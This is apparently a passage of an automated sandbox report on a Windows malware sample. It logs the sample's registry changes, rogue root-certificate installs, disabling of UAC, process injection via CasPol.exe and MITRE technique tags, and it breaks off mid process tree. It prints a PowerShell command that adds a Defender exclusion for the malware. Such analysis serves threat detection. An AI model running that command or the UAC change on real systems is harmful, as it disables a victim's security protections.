Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-385 = "Namibia Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-962 = "Paraguay Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time"	d7zkODciX9qGiSBDVgCwciil.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP"	WMIADAP.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-521 = "N. Central Asia Daylight Time"	windefender.exe

Modifies system certificate store 2 TTPs 9 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	csrss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2072	powershell.exe
1976	d7zkODciX9qGiSBDVgCwciil.exe
1632	VNg2XgrhtLvzc6ZQLgmlPtMG.exe
2152	d7zkODciX9qGiSBDVgCwciil.exe
2152	d7zkODciX9qGiSBDVgCwciil.exe
2152	d7zkODciX9qGiSBDVgCwciil.exe
2152	d7zkODciX9qGiSBDVgCwciil.exe
2152	d7zkODciX9qGiSBDVgCwciil.exe
1632	VNg2XgrhtLvzc6ZQLgmlPtMG.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
2256	VNg2XgrhtLvzc6ZQLgmlPtMG.exe
2256	VNg2XgrhtLvzc6ZQLgmlPtMG.exe
2256	VNg2XgrhtLvzc6ZQLgmlPtMG.exe
2256	VNg2XgrhtLvzc6ZQLgmlPtMG.exe
2256	VNg2XgrhtLvzc6ZQLgmlPtMG.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe
1992	injector.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
468	Process not Found

Suspicious use of AdjustPrivilegeToken 13 IoCs

description	pid	Process
Token: SeDebugPrivilege	2720	CasPol.exe
Token: SeDebugPrivilege	2072	powershell.exe
Token: SeDebugPrivilege	1976	d7zkODciX9qGiSBDVgCwciil.exe
Token: SeImpersonatePrivilege	1976	d7zkODciX9qGiSBDVgCwciil.exe
Token: SeDebugPrivilege	1632	VNg2XgrhtLvzc6ZQLgmlPtMG.exe
Token: SeImpersonatePrivilege	1632	VNg2XgrhtLvzc6ZQLgmlPtMG.exe
Token: SeSystemEnvironmentPrivilege	2924	csrss.exe
Token: SeDebugPrivilege	1632	VNg2XgrhtLvzc6ZQLgmlPtMG.exe
Token: SeImpersonatePrivilege	1632	VNg2XgrhtLvzc6ZQLgmlPtMG.exe
Token: SeDebugPrivilege	992	powershell.EXE
Token: SeSecurityPrivilege	1172	sc.exe
Token: SeSecurityPrivilege	1172	sc.exe
Token: SeDebugPrivilege	2648	powershell.EXE

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1564	tnmS1TzSKe9J8mB78miReTHx.tmp

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2164 wrote to memory of 2072	2164	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	28
PID 2164 wrote to memory of 2072	2164	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	28
PID 2164 wrote to memory of 2072	2164	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	28
PID 2164 wrote to memory of 2072	2164	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	28
PID 2164 wrote to memory of 2720	2164	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	30
PID 2164 wrote to memory of 2720	2164	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	30
PID 2164 wrote to memory of 2720	2164	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	30
PID 2164 wrote to memory of 2720	2164	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	30
PID 2164 wrote to memory of 2720	2164	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	30
PID 2164 wrote to memory of 2720	2164	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	30
PID 2164 wrote to memory of 2720	2164	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	30
PID 2164 wrote to memory of 2720	2164	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	30
PID 2164 wrote to memory of 2720	2164	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	30
PID 2720 wrote to memory of 1632	2720	CasPol.exe	31
PID 2720 wrote to memory of 1632	2720	CasPol.exe	31
PID 2720 wrote to memory of 1632	2720	CasPol.exe	31
PID 2720 wrote to memory of 1632	2720	CasPol.exe	31
PID 2720 wrote to memory of 1976	2720	CasPol.exe	32
PID 2720 wrote to memory of 1976	2720	CasPol.exe	32
PID 2720 wrote to memory of 1976	2720	CasPol.exe	32
PID 2720 wrote to memory of 1976	2720	CasPol.exe	32
PID 2720 wrote to memory of 616	2720	CasPol.exe	33
PID 2720 wrote to memory of 616	2720	CasPol.exe	33
PID 2720 wrote to memory of 616	2720	CasPol.exe	33
PID 2720 wrote to memory of 616	2720	CasPol.exe	33
PID 2152 wrote to memory of 2560	2152	d7zkODciX9qGiSBDVgCwciil.exe	43
PID 2152 wrote to memory of 2560	2152	d7zkODciX9qGiSBDVgCwciil.exe	43
PID 2152 wrote to memory of 2560	2152	d7zkODciX9qGiSBDVgCwciil.exe	43
PID 2152 wrote to memory of 2560	2152	d7zkODciX9qGiSBDVgCwciil.exe	43
PID 2560 wrote to memory of 1916	2560	cmd.exe	61
PID 2560 wrote to memory of 1916	2560	cmd.exe	61
PID 2560 wrote to memory of 1916	2560	cmd.exe	61
PID 2152 wrote to memory of 2924	2152	d7zkODciX9qGiSBDVgCwciil.exe	44
PID 2152 wrote to memory of 2924	2152	d7zkODciX9qGiSBDVgCwciil.exe	44
PID 2152 wrote to memory of 2924	2152	d7zkODciX9qGiSBDVgCwciil.exe	44
PID 2152 wrote to memory of 2924	2152	d7zkODciX9qGiSBDVgCwciil.exe	44
PID 2924 wrote to memory of 1992	2924	csrss.exe	51
PID 2924 wrote to memory of 1992	2924	csrss.exe	51
PID 2924 wrote to memory of 1992	2924	csrss.exe	51
PID 2924 wrote to memory of 1992	2924	csrss.exe	51
PID 2720 wrote to memory of 1884	2720	CasPol.exe	53
PID 2720 wrote to memory of 1884	2720	CasPol.exe	53
PID 2720 wrote to memory of 1884	2720	CasPol.exe	53
PID 2720 wrote to memory of 1884	2720	CasPol.exe	53
PID 2720 wrote to memory of 1884	2720	CasPol.exe	53
PID 2720 wrote to memory of 1884	2720	CasPol.exe	53
PID 2720 wrote to memory of 1884	2720	CasPol.exe	53
PID 2720 wrote to memory of 400	2720	CasPol.exe	55
PID 2720 wrote to memory of 400	2720	CasPol.exe	55
PID 2720 wrote to memory of 400	2720	CasPol.exe	55
PID 2720 wrote to memory of 400	2720	CasPol.exe	55
PID 2720 wrote to memory of 400	2720	CasPol.exe	55
PID 2720 wrote to memory of 400	2720	CasPol.exe	55
PID 2720 wrote to memory of 400	2720	CasPol.exe	55
PID 2720 wrote to memory of 2284	2720	CasPol.exe	59
PID 2720 wrote to memory of 2284	2720	CasPol.exe	59
PID 2720 wrote to memory of 2284	2720	CasPol.exe	59
PID 2720 wrote to memory of 2284	2720	CasPol.exe	59
PID 2720 wrote to memory of 2284	2720	CasPol.exe	59
PID 2720 wrote to memory of 2284	2720	CasPol.exe	59
PID 2720 wrote to memory of 2284	2720	CasPol.exe	59
PID 2284 wrote to memory of 1564	2284	tnmS1TzSKe9J8mB78miReTHx.exe	57
PID 2284 wrote to memory of 1564	2284	tnmS1TzSKe9J8mB78miReTHx.exe	57
PID 2284 wrote to memory of 1564	2284	tnmS1TzSKe9J8mB78miReTHx.exe	57

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe
"C:\Users\Admin\AppData\Local\Temp\ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe"
1⤵
- UAC bypass
- Windows security bypass
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2164
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe" -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2072
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
  2⤵
  - Drops startup file
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2720
- - C:\Users\Admin\Pictures\VNg2XgrhtLvzc6ZQLgmlPtMG.exe
    "C:\Users\Admin\Pictures\VNg2XgrhtLvzc6ZQLgmlPtMG.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1632
  - - C:\Users\Admin\Pictures\VNg2XgrhtLvzc6ZQLgmlPtMG.exe
